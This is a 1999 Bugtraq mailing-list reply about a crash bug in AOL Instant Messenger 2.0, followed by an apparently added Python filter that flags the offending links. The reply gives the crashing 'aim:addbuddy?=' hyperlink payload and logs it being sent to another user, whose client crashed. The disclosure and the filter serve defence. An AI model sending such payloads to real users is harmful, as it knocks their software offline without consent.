Bugtraq archives for 2nd quarter (Apr-Jun) 1999: Re: AOL Instant Messenger URL Crash

Re: AOL Instant Messenger URL Crash

Daniel Reed (djrNARNIA.N.ML.ORG)
Tue, 20 Apr 1999 16:24:02 -0400

On Mon, 19 Apr 1999, Adam Brown wrote:
) There is a bug in the newer versions of AOL's Instant Messenger that will
) cause the client to crash when exploited.  All builds of version 2.0 that
) I've tested seem to be vulnerable, although I have not done extensive
) version testing.  AOL was notified of this about two weeks ago.  To exploit
) this bug, send a hyperlink in this format: aim:addbuddy?=screenname
I just sent <a href="aim:addbuddy?=screenname">what does this show up as</a>?
to an AOL AIM 2.0.996 user and once she *clicked* on it AIM crashed. I don't
know if you meant to say that the user had to click on it for the client to
crash, or if this is indeed different behaviour. I also just tried it with
"screenname" replaced with first her screenname, and then with mine, again
with no automatic reaction.

(sent from linuxkitty, a naim-0.9.4-parse2 user, to <victim>, an AOL AIM
2.0.996 user)
[15:59:43] linuxkitty: [LINK:href="aim:addbuddy?=screenname":what does this show up as]?
[16:00:23] Friend <victim> has just logged off :(
[16:03:09] Friend <victim> is now online =)
[16:14:14] linuxkitty: [LINK:href="aim:addbuddy?=<victim>":miaow miaow] (don't click on that, I'm just testing something)
[16:14:50] linuxkitty: [LINK:href="aim:addbuddy?=linuxkitty":another test...]

--
Daniel Reed <nml.org>
Many a false step is made by standing still...
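
A receiving client or gateway could flag links of the shape reported in this thread before they are rendered as clickable. The following is an added example, not code from the original post or from any AIM or naim source. It assumes the distinguishing feature is a query pair with no name before `=` (the thread does not state the root cause); the function names and the `screenname=` form in the last sample are constructed for illustration.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

# naim renders links as [LINK:href="...":text], as in the log above.
NAIM_LINK = re.compile(r'\[LINK:href="([^"]*)":')


class HrefCollector(HTMLParser):
    """Collects href values of <a> tags from an HTML-formatted IM body."""

    def __init__(self):
        super().__init__()
        self.hrefs = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self.hrefs.extend(v for k, v in attrs if k == "href" and v)


def extract_hrefs(message):
    """Return link targets found as HTML anchors or naim LINK markup."""
    collector = HrefCollector()
    collector.feed(message)
    collector.close()
    return collector.hrefs + NAIM_LINK.findall(message)


def is_reported_shape(href):
    """True for aim:addbuddy links with a nameless '=value' query pair."""
    parts = urlsplit(href.strip())  # urlsplit lowercases the scheme
    if parts.scheme != "aim" or parts.path.lower() != "addbuddy":
        return False
    return any(pair.startswith("=") for pair in parts.query.split("&"))


def sanitize(message, placeholder="#blocked"):
    """Return (flagged hrefs, message with literal flagged hrefs replaced)."""
    flagged = [h for h in extract_hrefs(message) if is_reported_shape(h)]
    for href in flagged:
        message = message.replace(href, placeholder)
    return flagged, message


if __name__ == "__main__":
    samples = [  # first two taken from the thread, third constructed
        '<a href="aim:addbuddy?=screenname">what does this show up as</a>?',
        '[LINK:href="aim:addbuddy?=linuxkitty":another test...]',
        '<a href="aim:addbuddy?screenname=linuxkitty">constructed</a>',
    ]
    for s in samples:
        print(sanitize(s))
```

The replacement step works on the literal href text, so a deployment that receives entity-encoded attributes would need to rewrite the parsed link rather than the raw string.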